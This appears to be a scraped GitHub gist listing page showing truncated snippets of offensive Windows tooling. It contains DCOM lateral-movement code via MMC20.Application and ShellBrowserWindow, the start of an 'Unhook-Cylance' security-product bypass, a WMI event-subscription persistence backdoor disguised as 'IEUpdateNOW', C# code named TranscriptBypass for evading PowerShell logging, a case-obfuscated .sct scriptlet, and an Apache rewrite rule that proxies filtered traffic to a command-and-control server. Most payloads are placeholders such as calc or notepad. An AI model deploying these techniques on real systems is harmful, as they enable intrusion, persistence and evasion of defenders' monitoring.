View RunAs-NetOnly
Add-Type -TypeDefinition @" | |
using System; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
public static class Advapi32 | |
{ | |
[DllImport("advapi32.dll", SetLastError = true)] | |
public static extern bool LogonUser(string pszUsername, string pszDomain, string pszPassword, int dwLogonType, int dwLogonProvider, ref IntPtr phToken); | |
[DllImport("advapi32.dll", SetLastError=true)] |
View gist:1f2e3e7d7227b3a7e9740bba7a12fc2d
# MMC (Tested Windows 7, Windows 10, Server 2012R2): | |
dynamic c = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", "127.0.0.1")); | |
c.Document.ActiveView.ExecuteShellCommand(@"C:\Windows\System32\cmd.exe",null,"/c notepad.exe", "7"); | |
## Detection: svchost.exe -DCOMLaunch (parent cmdline) -> mmc.exe (process) | |
# ShellBrowserWindow (Tested Windows 10, Server 2012R2): | |
System.Type com = Type.GetTypeFromCLSID(Guid.Parse("C08AFD90-F2A1-11D1-8455-00A0C91F3880"), "127.0.0.1"); | |
dynamic obj = System.Activator.CreateInstance(com); | |
obj.Document.Application.ShellExecute("notepad.exe","","c:\\windows",null,0); |
View gist:1f31de5331842c25f4eed585d4bd2d65
function Unhook-Cylance() { | |
$winapi = @" | |
using System.Runtime.InteropServices; | |
using System; | |
public class Win32 { | |
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)] | |
public static extern IntPtr memcpy(IntPtr dest, string src, uint count); | |
[DllImport("kernel32")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); |
View WMIEvent
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} | |
#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows- | |
Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless- | |
Backdoor-wp.pdf |
View whoami.txt
([Security.Principal.WindowsIdentity]::GetCurrent()); | |
$tl=@{Expression={((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value};Label="Group Name";Width=400}; ([Security.Principal.WindowsIdentity]::GetCurrent()).Groups | FT $tl |
View posh.cs
using System; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Security; | |
using System.Management.Automation.Runspaces; | |
using System.Reflection; | |
namespace TranscriptBypass | |
{ | |
// Compiling with CSC.exe v4.0.30319 or v3.5 |
View posh.cs
using System; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
namespace TranscriptBypass | |
{ | |
// Compiling with CSC.exe v4.0.30319 or v3.5 | |
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll | |
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll |
View perms.ps1
Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation |
View sct
<cOmPoNeNt><sCRipT> | |
a=new ActiveXObject("Shell.Application").ShellExecute("calc.exe","","","open","0"); | |
</sCRipT></cOmPoNeNt> |
View Whitelist
# whitelist need to be formatted like so | |
# 104.44.44.44 - | |
# 104.33.33.33 - | |
RewriteMap ips txt:/opt/whitelist.txt | |
RewriteCond ${ips:%%{REMOTE_ADDR}|NOTFOUND} !NOTFOUND | |
RewriteCond %%{HTTP_USER_AGENT} "Mozilla\/5\.0 \(Windows NT 6\.1; WOW64\) AppleWebKit\/537\.36 \(KHTML, like Gecko\)" [NC] | |
RewriteRule ^/news/(.*) https://yourc2server.com/news/$1 [NC,P] |
NewerOlder